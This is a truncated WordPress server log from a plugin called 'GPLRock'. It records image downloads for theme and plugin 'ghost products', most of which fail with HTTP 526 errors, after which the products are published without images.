/home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-7e528a28.jpg [22-Mar-2026 12:03:44 UTC] GPLRock: Using pre-downloaded image for product artistic-digital-marketing-agency-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-7e528a28.jpg [22-Mar-2026 12:03:44 UTC] GPLRock: Ghost product published with image - Product ID: artistic-digital-marketing-agency-wordpress-theme [22-Mar-2026 12:03:45 UTC] GPLRock: Image downloaded successfully for product woocommerce-shipping-tracking (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-eb36c793.jpg [22-Mar-2026 12:03:45 UTC] GPLRock: Using pre-downloaded image for product woocommerce-shipping-tracking: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-eb36c793.jpg [22-Mar-2026 12:03:45 UTC] GPLRock: Ghost product published with image - Product ID: woocommerce-shipping-tracking [22-Mar-2026 12:03:47 UTC] GPLRock: Image downloaded successfully for product themify-magazine-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-57bd0179.jpg [22-Mar-2026 12:03:47 UTC] GPLRock: Using pre-downloaded image for product themify-magazine-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-57bd0179.jpg [22-Mar-2026 12:03:47 UTC] GPLRock: Ghost product published with image - Product ID: themify-magazine-wordpress-theme [22-Mar-2026 12:03:48 UTC] GPLRock: Image downloaded successfully for product use-your-drive-google-drive-plugin-for-wordpress (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-eb83725b.jpg [22-Mar-2026 12:03:48 UTC] GPLRock: Using pre-downloaded image for product use-your-drive-google-drive-plugin-for-wordpress: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-eb83725b.jpg [22-Mar-2026 12:03:48 UTC] GPLRock: Ghost product published with image - Product ID: use-your-drive-google-drive-plugin-for-wordpress [22-Mar-2026 12:03:50 UTC] GPLRock: Image downloaded successfully for product wordpress-multilingual-cms-wordpress-plugin (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-8a630b50.jpg [22-Mar-2026 12:03:50 UTC] GPLRock: Using pre-downloaded image for product wordpress-multilingual-cms-wordpress-plugin: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-8a630b50.jpg [22-Mar-2026 12:03:50 UTC] GPLRock: Ghost product published with image - Product ID: wordpress-multilingual-cms-wordpress-plugin [22-Mar-2026 12:04:33 UTC] GPLRock: Image download failed for product zyan-personal-portfolio-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [22-Mar-2026 12:04:35 UTC] GPLRock: Image download failed for product zyan-personal-portfolio-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [22-Mar-2026 12:04:37 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/zyan---personal-portfolio-wordpress-theme-15978.webp for product zyan-personal-portfolio-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [22-Mar-2026 12:04:37 UTC] GPLRock: Image download failed for product zyan-personal-portfolio-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [22-Mar-2026 12:04:39 UTC] GPLRock: Image download failed for product zyan-personal-portfolio-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [22-Mar-2026 12:04:41 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/zyan---personal-portfolio-wordpress-theme-15978.webp for product zyan-personal-portfolio-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [22-Mar-2026 12:04:41 UTC] GPLRock WARNING: Image download failed for product zyan-personal-portfolio-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/zyan---personal-portfolio-wordpress-theme-15978.webp [22-Mar-2026 12:04:41 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: zyan-personal-portfolio-wordpress-theme [22-Mar-2026 12:04:41 UTC] GPLRock: Image download failed for product wendola-wedding-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [22-Mar-2026 12:04:44 UTC] GPLRock: Image download failed for product wendola-wedding-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [22-Mar-2026 12:04:46 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/wendola---wedding-wordpress-theme-23027.webp for product wendola-wedding-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [22-Mar-2026 12:04:46 UTC] GPLRock: Image download failed for product wendola-wedding-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [22-Mar-2026 12:04:48 UTC] GPLRock: Image download failed for product wendola-wedding-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [22-Mar-2026 12:04:50 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/wendola---wedding-wordpress-theme-23027.webp for product wendola-wedding-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [22-Mar-2026 12:04:50 UTC] GPLRock WARNING: Image download failed for product wendola-wedding-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/wendola---wedding-wordpress-theme-23027.webp [22-Mar-2026 12:04:50 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: wendola-wedding-wordpress-theme [22-Mar-2026 12:04:50 UTC] GPLRock: Image download failed for product haaken-fashion-store-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [22-Mar-2026 12:04:52 UTC] GPLRock: Image download failed for product haaken-fashion-store-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [22-Mar-2026 12:04:54 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/haaken---fashion-store-wordpress-theme-9202.webp for product haaken-fashion-store-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [22-Mar-2026 12:04:54 UTC] GPLRock: Image download failed for product haaken-fashion-store-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [22-Mar-2026 12:04:56 UTC] GPLRock: Image download failed for product haaken-fashion-store-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [22-Mar-2026 12:04:59 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/haaken---fashion-store-wordpress-theme-9202.webp for product haaken-fashion-store-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [22-Mar-2026 12:04:59 UTC] GPLRock WARNING: Image download failed for product haaken-fashion-store-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/haaken---fashion-store-wordpress-theme-9202.webp [22-Mar-2026 12:04:59 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: haaken-fashion-store-wordpress-theme [22-Mar-2026 12:04:59 UTC] GPLRock: Image download failed for product zank-shoes-fashion-store-woocommerce (attempt 1/3). HTTP Code: 526, Error: . Retrying... [22-Mar-2026 12:05:01 UTC] GPLRock: Image download failed for product zank-shoes-fashion-store-woocommerce (attempt 2/3). HTTP Code: 526, Error: . Retrying... [22-Mar-2026 12:05:03 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/zank---shoes-fashion-store-woocommerce-24925.webp for product zank-shoes-fashion-store-woocommerce after 3 attempts. HTTP Code: 526, Error: [22-Mar-2026 12:05:03 UTC] GPLRock: Image download failed for product zank-shoes-fashion-store-woocommerce (attempt 1/3). HTTP Code: 526, Error: . Retrying... [22-Mar-2026 12:05:05 UTC] GPLRock: Image download failed for product zank-shoes-fashion-store-woocommerce (attempt 2/3). HTTP Code: 526, Error: . Retrying... [22-Mar-2026 12:05:07 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/zank---shoes-fashion-store-woocommerce-24925.webp for product zank-shoes-fashion-store-woocommerce after 3 attempts. HTTP Code: 526, Error: [22-Mar-2026 12:05:07 UTC] GPLRock WARNING: Image download failed for product zank-shoes-fashion-store-woocommerce. URL: https://meldwp.com/wp-content/uploads/zank---shoes-fashion-store-woocommerce-24925.webp [22-Mar-2026 12:05:07 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: zank-shoes-fashion-store-woocommerce [22-Mar-2026 12:05:08 UTC] GPLRock: Image download failed for product ovent-event-conference-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [22-Mar-2026 12:05:10 UTC] GPLRock: Image download failed for product ovent-event-conference-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [22-Mar-2026 12:05:12 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/ovent---event-conference-wordpress-theme-5504.webp for product ovent-event-conference-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [22-Mar-2026 12:05:12 UTC] GPLRock: Image download failed for product ovent-event-conference-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [22-Mar-2026 12:05:14 UTC] GPLRock: Image download failed for product ovent-event-conference-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [22-Mar-2026 12:05:16 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/ovent---event-conference-wordpress-theme-5504.webp for product ovent-event-conference-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [22-Mar-2026 12:05:16 UTC] GPLRock WARNING: Image download failed for product ovent-event-conference-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/ovent---event-conference-wordpress-theme-5504.webp [22-Mar-2026 12:05:16 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: ovent-event-conference-wordpress-theme [22-Mar-2026 12:05:16 UTC] GPLRock: Image download failed for product howello-hotel-and-resort-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [22-Mar-2026 12:05:19 UTC] GPLRock: Image download failed for product howello-hotel-and-resort-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [22-Mar-2026 12:05:21 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/howello--hotel-and-resort-wordpress-theme-28368.webp for product howello-hotel-and-resort-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [22-Mar-2026 12:05:21 UTC] GPLRock: Image download failed for product howello-hotel-and-resort-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [22-Mar-2026 12:05:23 UTC] GPLRock: Image download failed for product howello-hotel-and-resort-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [22-Mar-2026 12:05:25 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/howello--hotel-and-resort-wordpress-theme-28368.webp for product howello-hotel-and-resort-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [22-Mar-2026 12:05:25 UTC] GPLRock WARNING: Image download failed for product howello-hotel-and-resort-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/howello--hotel-and-resort-wordpress-theme-28368.webp [22-Mar-2026 12:05:25 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: howello-hotel-and-resort-wordpress-theme [22-Mar-2026 12:05:25 UTC] GPLRock: Image downloaded successfully for product owl-multipurpose-restaurant-cafe-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-adf678e7.webp [22-Mar-2026 12:05:25 UTC] GPLRock: Using pre-downloaded image for product owl-multipurpose-restaurant-cafe-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-adf678e7.webp [22-Mar-2026 12:05:25 UTC] GPLRock: Ghost product published with image - Product ID: owl-multipurpose-restaurant-cafe-wordpress-theme [22-Mar-2026 12:05:26 UTC] GPLRock: Image download failed for product mezon-plumber-handyman-services-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [22-Mar-2026 12:05:28 UTC] GPLRock: Image download failed for product mezon-plumber-handyman-services-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [22-Mar-2026 12:05:30 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/mezon---plumber-handyman-services-wordpress-theme-6356.webp for product mezon-plumber-handyman-services-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [22-Mar-2026 12:05:30 UTC] GPLRock: Image download failed for product mezon-plumber-handyman-services-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [22-Mar-2026 12:05:32 UTC] GPLRock: Image download failed for product mezon-plumber-handyman-services-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [22-Mar-2026 12:05:34 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/mezon---plumber-handyman-services-wordpress-theme-6356.webp for product mezon-plumber-handyman-services-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [22-Mar-2026 12:05:34 UTC] GPLRock WARNING: Image download failed for product mezon-plumber-handyman-services-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/mezon---plumber-handyman-services-wordpress-theme-6356.webp [22-Mar-2026 12:05:34 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: mezon-plumber-handyman-services-wordpress-theme [22-Mar-2026 12:05:34 UTC] GPLRock: Image download failed for product elegance-wordpress-blog-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [22-Mar-2026 12:05:37 UTC] GPLRock: Image download failed for product elegance-wordpress-blog-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [22-Mar-2026 12:05:39 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/elegance---wordpress-blog-theme-25718.webp for product elegance-wordpress-blog-theme after 3 attempts. HTTP Code: 526, Error: [22-Mar-2026 12:05:39 UTC] GPLRock: Image download failed for product elegance-wordpress-blog-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [22-Mar-2026 12:05:41 UTC] GPLRock: Image download failed for product elegance-wordpress-blog-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [22-Mar-2026 12:05:43 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/elegance---wordpress-blog-theme-25718.webp for product elegance-wordpress-blog-theme after 3 attempts. HTTP Code: 526, Error: [22-Mar-2026 12:05:43 UTC] GPLRock WARNING: Image download failed for product elegance-wordpress-blog-theme. URL: https://meldwp.com/wp-content/uploads/elegance---wordpress-blog-theme-25718.webp [22-Mar-2026 12:05:43 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: elegance-wordpress-blog-theme [22-Mar-2026 12:05:43 UTC] GPLRock WARNING: No image URL for product professional-wordpress-theme [22-Mar-2026 12:05:43 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: professional-wordpress-theme [22-Mar-2026 12:05:48 UTC] GPLRock: Image download failed for product portfolio-and-gallery-grid-layout-with-carousel-for-wordpress (attempt 1/3). HTTP Code: 526, Error: . Retrying... [22-Mar-2026 12:05:50 UTC] GPLRock: Image download failed for product portfolio-and-gallery-grid-layout-with-carousel-for-wordpress (attempt 2/3). HTTP Code: 526, Error: . Retrying... [22-Mar-2026 12:05:52 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/portfolio-and-gallery-grid-layout-with-carousel-for-wordpress-31681.webp for product portfolio-and-gallery-grid-layout-with-carousel-for-wordpress after 3 attempts. HTTP Code: 526, Error: [22-Mar-2026 12:05:52 UTC] GPLRock: Image download failed for product portfolio-and-gallery-grid-layout-with-carousel-for-wordpress (attempt 1/3). HTTP Code: 526, Error: . Retrying... [22-Mar-2026 12:05:54 UTC] GPLRock: Image download failed for product portfolio-and-gallery-grid-layout-with-carousel-for-wordpress (attempt 2/3). HTTP Code: 526, Error: . Retrying... [22-Mar-2026 12:05:57 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/portfolio-and-gallery-grid-layout-with-carousel-for-wordpress-31681.webp for product portfolio-and-gallery-grid-layout-with-carousel-for-wordpress after 3 attempts. HTTP Code: 526, Error: [22-Mar-2026 12:05:57 UTC] GPLRock WARNING: Image download failed for product portfolio-and-gallery-grid-layout-with-carousel-for-wordpress. URL: https://meldwp.com/wp-content/uploads/portfolio-and-gallery-grid-layout-with-carousel-for-wordpress-31681.webp [22-Mar-2026 12:05:57 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: portfolio-and-gallery-grid-layout-with-carousel-for-wordpress [22-Mar-2026 12:05:57 UTC] GPLRock: Image download failed for product bwl-poll-manager (attempt 1/3). HTTP Code: 526, Error: . Retrying... [22-Mar-2026 12:05:59 UTC] GPLRock: Image download failed for product bwl-poll-manager (attempt 2/3). HTTP Code: 526, Error: . Retrying... [22-Mar-2026 12:06:01 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/bwl-poll-manager-11105.webp for product bwl-poll-manager after 3 attempts. HTTP Code: 526, Error: [22-Mar-2026 12:06:01 UTC] GPLRock: Image download failed for product bwl-poll-manager (attempt 1/3). HTTP Code: 526, Error: . Retrying... [22-Mar-2026 12:06:03 UTC] GPLRock: Image download failed for product bwl-poll-manager (attempt 2/3). HTTP Code: 526, Error: . Retrying... [22-Mar-2026 12:06:05 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/bwl-poll-manager-11105.webp for product bwl-poll-manager after 3 attempts. HTTP Code: 526, Error: [22-Mar-2026 12:06:05 UTC] GPLRock WARNING: Image download failed for product bwl-poll-manager. URL: https://meldwp.com/wp-content/uploads/bwl-poll-manager-11105.webp [22-Mar-2026 12:06:05 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: bwl-poll-manager [22-Mar-2026 12:06:05 UTC] GPLRock: Image download failed for product woocommerce-create-a-drawer-composite-product-builder-plugin (attempt 1/3). HTTP Code: 526, Error: . Retrying... [22-Mar-2026 12:06:08 UTC] GPLRock: Image download failed for product woocommerce-create-a-drawer-composite-product-builder-plugin (attempt 2/3). HTTP Code: 526, Error: . Retrying... [22-Mar-2026 12:06:10 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/woocommerce-create-a-drawer---composite-product-builder-plugin-20021.webp for product woocommerce-create-a-drawer-composite-product-builder-plugin after 3 attempts. HTTP Code: 526, Error: [22-Mar-2026 12:06:10 UTC] GPLRock: Image download failed for product woocommerce-create-a-drawer-composite-product-builder-plugin (attempt 1/3). HTTP Code: 526, Error: . Retrying... [22-Mar-2026 12:06:12 UTC] GPLRock: Image download failed for product woocommerce-create-a-drawer-composite-product-builder-plugin (attempt 2/3). HTTP Code: 526, Error: . Retrying... [22-Mar-2026 12:06:14 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/woocommerce-create-a-drawer---composite-product-builder-plugin-20021.webp for product woocommerce-create-a-drawer-composite-product-builder-plugin after 3 attempts. HTTP Code: 526, Error: [22-Mar-2026 12:06:14 UTC] GPLRock WARNING: Image download failed for product woocommerce-create-a-drawer-composite-product-builder-plugin. URL: https://meldwp.com/wp-content/uploads/woocommerce-create-a-drawer---composite-product-builder-plugin-20021.webp [22-Mar-2026 12:06:14 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: woocommerce-create-a-drawer-composite-product-builder-plugin [22-Mar-2026 12:06:14 UTC] GPLRock: Image download failed for product jquery-timelinexml (attempt 1/3). HTTP Code: 526, Error: . Retrying... [22-Mar-2026 12:06:16 UTC] GPLRock: Image download failed for product jquery-timelinexml (attempt 2/3). HTTP Code: 526, Error: . Retrying... [22-Mar-2026 12:06:18 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/jquery-timelinexml-17100.webp for product jquery-timelinexml after 3 attempts. HTTP Code: 526, Error: [22-Mar-2026 12:06:18 UTC] GPLRock: Image download failed for product jquery-timelinexml (attempt 1/3). HTTP Code: 526, Error: . Retrying... [22-Mar-2026 12:06:21 UTC] GPLRock: Image download failed for product jquery-timelinexml (attempt 2/3). HTTP Code: 526, Error: . Retrying... [22-Mar-2026 12:06:23 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/jquery-timelinexml-17100.webp for product jquery-timelinexml after 3 attempts. HTTP Code: 526, Error: [22-Mar-2026 12:06:23 UTC] GPLRock WARNING: Image download failed for product jquery-timelinexml. URL: https://meldwp.com/wp-content/uploads/jquery-timelinexml-17100.webp [22-Mar-2026 12:06:23 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: jquery-timelinexml [22-Mar-2026 12:06:23 UTC] GPLRock: Image download failed for product personalization-for-wpbakery-page-builder (attempt 1/3). HTTP Code: 526, Error: . Retrying... [22-Mar-2026 12:06:25 UTC] GPLRock: Image download failed for product personalization-for-wpbakery-page-builder (attempt 2/3). HTTP Code: 526, Error: . Retrying... [22-Mar-2026 12:06:27 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/personalization-for-wpbakery-page-builder-25017.webp for product personalization-for-wpbakery-page-builder after 3 attempts. HTTP Code: 526, Error: [22-Mar-2026 12:06:27 UTC] GPLRock: Image download failed for product personalization-for-wpbakery-page-builder (attempt 1/3). HTTP Code: 526, Error: . Retrying... [22-Mar-2026 12:06:29 UTC] GPLRock: Image download failed for product personalization-for-wpbakery-page-builder (attempt 2/3). HTTP Code: 526, Error: . Retrying... [22-Mar-2026 12:06:31 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/personalization-for-wpbakery-page-builder-25017.webp for product personalization-for-wpbakery-page-builder after 3 attempts. HTTP Code: 526, Error: [22-Mar-2026 12:06:31 UTC] GPLRock WARNING: Image download failed for product personalization-for-wpbakery-page-builder. URL: https://meldwp.com/wp-content/uploads/personalization-for-wpbakery-page-builder-25017.webp [22-Mar-2026 12:06:31 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: personalization-for-wpbakery-page-builder [22-Mar-2026 12:06:32 UTC] GPLRock: Image download failed for product smooth-zoom-pan-jquery-image-viewer (attempt 1/3). HTTP Code: 526, Error: . Retrying... [22-Mar-2026 12:06:34 UTC] GPLRock: Image download failed for product smooth-zoom-pan-jquery-image-viewer (attempt 2/3). HTTP Code: 526, Error: . Retrying... [22-Mar-2026 12:06:36 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/smooth-zoom-pan---jquery-image-viewer-16570.webp for product smooth-zoom-pan-jquery-image-viewer after 3 attempts. HTTP Code: 526, Error: [22-Mar-2026 12:06:36 UTC] GPLRock: Image download failed for product smooth-zoom-pan-jquery-image-viewer (attempt 1/3). HTTP Code: 526, Error: . Retrying... [22-Mar-2026 12:06:38 UTC] GPLRock: Image download failed for product smooth-zoom-pan-jquery-image-viewer (attempt 2/3). HTTP Code: 526, Error: . Retrying... [22-Mar-2026 12:06:40 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/smooth-zoom-pan---jquery-image-viewer-16570.webp for product smooth-zoom-pan-jquery-image-viewer after 3 attempts. HTTP Code: 526, Error: [22-Mar-2026 12:06:40 UTC] GPLRock WARNING: Image download failed for product smooth-zoom-pan-jquery-image-viewer. URL: https://meldwp.com/wp-content/uploads/smooth-zoom-pan---jquery-image-viewer-16570.webp [22-Mar-2026 12:06:40 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: smooth-zoom-pan-jquery-image-viewer [22-Mar-2026 12:06:40 UTC] GPLRock: Image download failed for product read-aloud-plugin-real-time-text-to-speech-for-wordpress (attempt 1/3). HTTP Code: 526, Error: . Retrying... [22-Mar-2026 12:06:42 UTC] GPLRock: Image download failed for product read-aloud-plugin-real-time-text-to-speech-for-wordpress (attempt 2/3). HTTP Code: 526, Error: . Retrying... [22-Mar-2026 12:06:44 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/read-aloud-plugin-real-time-text-to-speech-for-wordpress-27890.webp for product read-aloud-plugin-real-time-text-to-speech-for-wordpress after 3 attempts. HTTP Code: 526, Error: [22-Mar-2026 12:06:45 UTC] GPLRock: Image download failed for product read-aloud-plugin-real-time-text-to-speech-for-wordpress (attempt 1/3). HTTP Code: 526, Error: . Retrying... [22-Mar-2026 12:06:47 UTC] GPLRock: Image download failed for product read-aloud-plugin-real-time-text-to-speech-for-wordpress (attempt 2/3). HTTP Code: 526, Error: . Retrying... [22-Mar-2026 12:06:49 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/read-aloud-plugin-real-time-text-to-speech-for-wordpress-27890.webp for product read-aloud-plugin-real-time-text-to-speech-for-wordpress after 3 attempts. HTTP Code: 526, Error: [22-Mar-2026 12:06:49 UTC] GPLRock WARNING: Image download failed for product read-aloud-plugin-real-time-text-to-speech-for-wordpress. URL: https://meldwp.com/wp-content/uploads/read-aloud-plugin-real-time-text-to-speech-for-wordpress-27890.webp [22-Mar-2026 12:06:49 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: read-aloud-plugin-real-time-text-to-speech-for-wordpress [22-Mar-2026 12:06:49 UTC] GPLRock: Image download failed for product keyword-linking-for-wordpress (attempt 1/3). HTTP Code: 526, Error: . Retrying... [22-Mar-2026 12:06:51 UTC] GPLRock: Image download failed for product keyword-linking-for-wordpress (attempt 2/3). HTTP Code: 526, Error: . Retrying... [22-Mar-2026 12:06:53 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/keyword-linking-for-wordpress-28673.webp for product keyword-linking-for-wordpress after 3 attempts. HTTP Code: 526, Error: [22-Mar-2026 12:06:53 UTC] GPLRock: Image download failed for product keyword-linking-for-wordpress (attempt 1/3). HTTP Code: 526, Error: . Retrying... [22-Mar-2026 12:06:55 UTC] GPLRock: Image download failed for product keyword-linking-for-wordpress (attempt 2/3). HTTP Code: 526, Error: . Retrying... [22-Mar-2026 12:06:58 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/keyword-linking-for-wordpress-28673.webp for product keyword-linking-for-wordpress after 3 attempts. HTTP Code: 526, Error: [22-Mar-2026 12:06:58 UTC] GPLRock WARNING: Image download failed for product keyword-linking-for-wordpress. URL: https://meldwp.com/wp-content/uploads/keyword-linking-for-wordpress-28673.webp [22-Mar-2026 12:06:58 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: keyword-linking-for-wordpress [22-Mar-2026 12:06:58 UTC] GPLRock: Image download failed for product on-scroll-section-effects-for-elementor (attempt 1/3). HTTP Code: 526, Error: . Retrying... [22-Mar-2026 12:07:00 UTC] GPLRock: Image download failed for product on-scroll-section-effects-for-elementor (attempt 2/3). HTTP Code: 526, Error: . Retrying... [22-Mar-2026 12:07:02 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/on-scroll-section-effects-for-elementor-18983.webp for product on-scroll-section-effects-for-elementor after 3 attempts. HTTP Code: 526, Error: [22-Mar-2026 12:07:03 UTC] GPLRock: Image download failed for product on-scroll-section-effects-for-elementor (attempt 1/3). HTTP Code: 526, Error: . Retrying... [22-Mar-2026 12:07:05 UTC] GPLRock: Image download failed for product on-scroll-section-effects-for-elementor (attempt 2/3). HTTP Code: 526, Error: . Retrying... [22-Mar-2026 12:07:07 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/on-scroll-section-effects-for-elementor-18983.webp for product on-scroll-section-effects-for-elementor after 3 attempts. HTTP Code: 526, Error: [22-Mar-2026 12:07:07 UTC] GPLRock WARNING: Image download failed for product on-scroll-section-effects-for-elementor. URL: https://meldwp.com/wp-content/uploads/on-scroll-section-effects-for-elementor-18983.webp [22-Mar-2026 12:07:07 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: on-scroll-section-effects-for-elementor [22-Mar-2026 12:07:07 UTC] GPLRock: Image download failed for product wordpress-booking-hotel (attempt 1/3). HTTP Code: 526, Error: . Retrying... [22-Mar-2026 12:07:09 UTC] GPLRock: Image download failed for product wordpress-booking-hotel (attempt 2/3). HTTP Code: 526, Error: . Retrying... [22-Mar-2026 12:07:11 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/wordpress-booking-hotel-30139.webp for product wordpress-booking-hotel after 3 attempts. HTTP Code: 526, Error: [22-Mar-2026 12:07:11 UTC] GPLRock: Image download failed for product wordpress-booking-hotel (attempt 1/3). HTTP Code: 526, Error: . Retrying... [22-Mar-2026 12:07:14 UTC] GPLRock: Image download failed for product wordpress-booking-hotel (attempt 2/3). HTTP Code: 526, Error: . Retrying... [22-Mar-2026 12:07:16 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/wordpress-booking-hotel-30139.webp for product wordpress-booking-hotel after 3 attempts. HTTP Code: 526, Error: [22-Mar-2026 12:07:16 UTC] GPLRock WARNING: Image download failed for product wordpress-booking-hotel. URL: https://meldwp.com/wp-content/uploads/wordpress-booking-hotel-30139.webp [22-Mar-2026 12:07:16 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: wordpress-booking-hotel [22-Mar-2026 14:23:43 UTC] GPLRock: Image download failed for product tucson-sports-fitness-and-gym-responsive-woocommerce-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [22-Mar-2026 14:23:45 UTC] GPLRock: Image download failed for product tucson-sports-fitness-and-gym-responsive-woocommerce-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [22-Mar-2026 14:23:47 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/tucson---sports-fitness-and-gym-responsive-woocommerce-wordpress-theme-26422.webp for product tucson-sports-fitness-and-gym-responsive-woocommerce-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [22-Mar-2026 14:23:47 UTC] GPLRock: Image download failed for product 